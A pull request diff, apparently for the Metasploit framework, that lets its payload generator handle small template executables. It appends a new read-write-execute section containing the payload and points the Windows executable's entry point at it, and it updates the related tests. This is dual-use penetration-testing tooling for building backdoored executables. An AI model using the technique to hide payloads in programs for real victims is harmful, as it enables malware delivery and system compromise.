### PR TITLE
Support large payloads for msfvenom EXE generation

### DIFF
--- a/lib/msf/core/exe/segment_appender.rb
+++ b/lib/msf/core/exe/segment_appender.rb
@@ -1,0 +1,51 @@
+# -*- coding: binary -*-
+module Msf
+module Exe
+
+  require 'metasm'
+  require 'msf/core/exe/segment_injector'
+
+  class SegmentAppender < SegmentInjector
+
+    def payload_stub(prefix)
+      # TODO: Implement possibly helpful payload obfuscation
+      asm = "new_entrypoint:\n#{prefix}\n"
+      shellcode = Metasm::Shellcode.assemble(processor, asm)
+      shellcode.encoded + @payload
+    end
+
+    def generate_pe
+      # Copy our Template into a new PE
+      pe_orig = Metasm::PE.decode_file(template)
+      pe = pe_orig.mini_copy
+
+      # Copy the headers and exports
+      pe.mz.encoded = pe_orig.encoded[0, pe_orig.coff_offset-4]
+      pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
+      pe.header.time = pe_orig.header.time
+
+      # Don't rebase if we can help it since Metasm doesn't do relocations well
+      pe.optheader.dll_characts.delete("DYNAMIC_BASE")
+
+      # TODO: Look at supporting DLLs in the future
+      prefix = ''
+
+      # Create a new section
+      s = Metasm::PE::Section.new
+      s.name = '.' + Rex::Text.rand_text_alpha_lower(4)
+      s.encoded = payload_stub prefix
+      s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
+
+      pe.sections << s
+      pe.invalidate_header
+
+      # Change the entrypoint to our new section
+      pe.optheader.entrypoint = 'new_entrypoint'
+      pe.cpu = pe_orig.cpu
+
+      pe.encode_string
+    end
+
+  end
+end
+end

--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -59,20 +59,11 @@ module Exe
       EOS
     end
 
-    def payload_as_asm
-      asm = ''
-      @payload.each_byte do |byte|
-        asm << "db " + sprintf("0x%02x", byte) + "\n"
-      end
-      return asm
-    end
-
     def payload_stub(prefix)
       asm = "hook_entrypoint:\n#{prefix}\n"
       asm << create_thread_stub
-      asm << payload_as_asm
       shellcode = Metasm::Shellcode.assemble(processor, asm)
-      shellcode.encoded
+      shellcode.encoded + @payload
     end
 
     def generate_pe

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -18,6 +18,7 @@ require 'rex/zip'
 require 'metasm'
 require 'digest/sha1'
 require 'msf/core/exe/segment_injector'
+require 'msf/core/exe/segment_appender'
 
   ##
   #
@@ -198,6 +199,9 @@ require 'msf/core/exe/segment_injector'
       return injector.generate_pe
     end
 
+
+    # dead, dead code.
+
     raise RuntimeError, "No .text section found in the template" unless text
 
     unless text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint)
@@ -205,12 +209,15 @@ require 'msf/core/exe/segment_injector'
     end
 
     p_length = payload.length + 256
+
+    # If the .text section is too small, append a new section instead
     if text.size < p_length
-      fname = ::File.basename(opts[:template])
-      msg  = "The .text section for '#{fname}' is too small. "
-      msg << "Minimum is #{p_length.to_s} bytes, your .text section is " +
-             "#{text.size.to_s} bytes"
-      raise RuntimeError, msg
+      appender = Msf::Exe::SegmentAppender.new({
+          :payload  => code,
+          :template => opts[:template],
+          :arch     => :x86
+      })
+      return appender.generate_pe
     end
 
     # Store some useful offsets
@@ -506,7 +513,8 @@ require 'msf/core/exe/segment_injector'
   def self.to_win64pe(framework, code, opts = {})
     # Allow the user to specify their own EXE template
     set_template_default(opts, "template_x64_windows.exe")
-    #try to inject code into executable by adding a section without affecting executable behavior
+
+    # Try to inject code into executable by adding a section without affecting executable behavior
     if opts[:inject]
       injector = Msf::Exe::SegmentInjector.new({
          :payload  => code,
@@ -515,8 +523,20 @@ require 'msf/core/exe/segment_injector'
       })
       return injector.generate_pe
     end
+
     opts[:exe_type] = :exe_sub
-    exe_sub_method(code,opts)
+    return exe_sub_method(code,opts)
+
+    #
+    # TODO: 64-bit support is currently failing to stage
+    #
+    # Append a new section instead
+    # appender = Msf::Exe::SegmentAppender.new({
+    #   :payload  => code,
+    #   :template => opts[:template],
+    #   :arch     => :x64
+    # })
+    # return appender.generate_pe
   end
 
   # Embeds shellcode within a Windows PE file implementing the Windows

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -199,9 +199,6 @@ require 'msf/core/exe/segment_appender'
       return injector.generate_pe
     end
 
-
-    # dead, dead code.
-
     raise RuntimeError, "No .text section found in the template" unless text
 
     unless text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint)

--- a/spec/lib/msf/core/exe/segment_appender_spec.rb
+++ b/spec/lib/msf/core/exe/segment_appender_spec.rb
@@ -1,7 +1,7 @@
 require 'spec_helper'
-require 'msf/core/exe/segment_injector'
+require 'msf/core/exe/segment_appender'
 
-describe Msf::Exe::SegmentInjector do
+describe Msf::Exe::SegmentAppender do
 
   let(:opts) do
     option_hash = {
@@ -42,10 +42,6 @@ describe Msf::Exe::SegmentInjector do
         injector.buffer_register.should == 'eax'
       end
     end
-
-    it 'should set a buffer register for the payload' do
-      injector.create_thread_stub.should include('lea edx, [thread_hook]')
-    end
   end
 
   describe '#generate_pe' do
@@ -67,10 +63,10 @@ describe Msf::Exe::SegmentInjector do
         exe.sections.count.should == 5
       end
 
-      it 'should have all the right section names' do
+      it 'should have all the right original section names' do
         s_names = []
         exe.sections.collect {|s| s_names << s.name}
-        s_names.should == [".text", ".rdata", ".data", ".rsrc", ".text"]
+        s_names[0,4].should == [".text", ".rdata", ".data", ".rsrc"]
       end
 
       it 'should have the last section set to RWX' do


### PR DESCRIPTION
This changes the behavior of to_win32pe() such that it can handle EXEs with small .text sections by appending a new section instead, as opposed to throwing an error. Tested with stageless and staged meterpreter. 64-bit support is not included in this PR because of buggy behavior that might also apply to master and will be handled in a separate PR.
